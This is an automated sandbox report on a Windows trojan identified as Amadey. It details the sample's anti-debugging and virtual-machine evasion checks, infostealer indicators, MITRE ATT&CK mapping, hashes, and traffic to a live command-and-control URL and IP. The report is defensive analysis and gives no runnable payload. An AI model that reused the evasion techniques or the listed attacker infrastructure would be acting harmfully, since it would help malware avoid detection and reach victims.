Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A6D second address: 70C0A94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC19D472F2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A94 second address: 70C0AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19CEC1DCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0AA4 second address: 70C0B00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushfd 0x0000000c jmp 00007FC19D472F33h 0x00000011 sub esi, 241F06BEh 0x00000017 jmp 00007FC19D472F39h 0x0000001c popfd 0x0000001d pop esi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FC19D472F2Ah 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC19D472F2Ah 0x00000030 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSpecial instruction interceptor: First address: ABD9FC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSpecial instruction interceptor: First address: ABB182 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSpecial instruction interceptor: First address: CE25AC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe TID: 7068Thread sleep time: -44022s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe TID: 7044Thread sleep time: -30015s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe TID: 7040Thread sleep time: -54027s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000002.2840088094.0000000000C35000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: fnuFOEqg4j.exeBinary or memory string: Hyper-V RAW
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: fnuFOEqg4j.exe, 00000000.00000003.2417036277.0000000006991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#}}
Source: fnuFOEqg4j.exe, 00000000.00000002.2840088094.0000000000C35000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: fnuFOEqg4j.exe, 00000000.00000003.2838831418.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2839282706.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2750348984.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838552813.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2842014481.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838456196.00000000016B1000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838779723.00000000016BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile opened: NTICE
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile opened: SICE
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeProcess queried: DebugPortJump to behavior
Source: fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000002.2840088094.0000000000C35000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: mProgram Manager
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.12:49711 -> 147.45.113.159:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping741
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets214
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
fnuFOEqg4j.exe66%ReversingLabsWin32.Trojan.Amadey
fnuFOEqg4j.exe100%AviraTR/Crypt.TPM.Gen
fnuFOEqg4j.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20pn.top
147.45.113.159
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlfnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdfnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://httpbin.org/ipbeforefnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.htmlfnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000003.2838493021.0000000001662000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2841593023.0000000001664000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838749363.0000000001664000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://curl.se/docs/alt-svc.htmlfnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.cssfnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322::3fnuFOEqg4j.exe, 00000000.00000002.2841276456.000000000162E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://.jpgfnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFfnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                98.85.100.80
                                		httpbin.orgUnited States
                                		11351TWC-11351-NORTHEASTUSfalse
                                147.45.113.159
                                		home.twentytk20pn.topRussian Federation
                                		2895FREE-NET-ASFREEnetEUfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1578959
                                Start date and time:2024-12-20 17:05:44 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 50s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:5
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:fnuFOEqg4j.exe
                                renamed because original name is a hash value
                                Original Sample Name:61039d97d478405525707e3c0b4b3003.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 51%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target fnuFOEqg4j.exe, PID 6988 because there are no executed function
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: fnuFOEqg4j.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                11:07:15API Interceptor97x Sleep call for process: fnuFOEqg4j.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                98.85.100.80iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                  S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                    QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                      EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                        h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                          icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                              u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                  t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                    147.45.113.159S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                    • twentytk20pn.top/v1/upload.php
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=2Rb3R6cTcShMDFLr1734664370
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                    • twentytk20pn.top/v1/upload.php
                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=aMcIUlaEFPceCafP1734635514

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    home.twentytk20pn.topS0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 147.45.113.159
                                                    1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                    • 147.45.113.159
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 147.45.113.159
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                    • 147.45.113.159
                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                    • 147.45.113.159
                                                    httpbin.orgiuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                                    • 34.226.108.155
                                                    QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    TWC-11351-NORTHEASTUSiuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                    • 98.85.100.80
                                                    FREE-NET-ASFREEnetEUS0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 147.45.113.159
                                                    1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.113.159
                                                    Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                    • 147.45.44.131
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                    • 147.45.113.159
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 147.45.113.159
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                    • 147.45.113.159

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Entropy (8bit):7.9860824286013745
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:fnuFOEqg4j.exe
                                                    File size:4'421'632 bytes
                                                    MD5:61039d97d478405525707e3c0b4b3003
                                                    SHA1:501cf467cd61ca88a1e0991c2d7899a97237d8ff
                                                    SHA256:be39f15bfaeb90c138dbbc06f647ba537c5b451459343b9ef2a5583c0a02a89c
                                                    SHA512:d08d9262de6777f0b9f7d010462ec669d3f58cc202c528ca8caac9c9611a50629ee3c311abc3689fa7ce2e52eb1dacc17b3e9f0aac61ffa6f924e903879d74ee
                                                    SSDEEP:98304:rJjB8hwcXiocct8XrfDDUR8o7iPiyg9GrLi+3OgQp8odxsw53Er:t+WE8Xr0Rt7crg9Gu+3OgQQw
                                                    TLSH:A82633909D888E00FB28547EE1CD2C8A3E756D362C356D01FA867A7D259F6BB2017D3C
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@..................................PD...@... ............................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0xf49000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                    DLL Characteristics:DYNAMIC_BASE
                                                    Time Stamp:0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp 00007FC19D14CE4Ah
                                                    orps xmm0, dqword ptr [ebx+00h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    jmp 00007FC19D14EE45h
                                                    add byte ptr [edi], al
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dh
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], 00000000h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    pop es
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], cl
                                                    add byte ptr [eax], 00000000h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add eax, 0000000Ah
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x61905f0x73.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6180000x2b0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb47ac40x10jjnhjgow
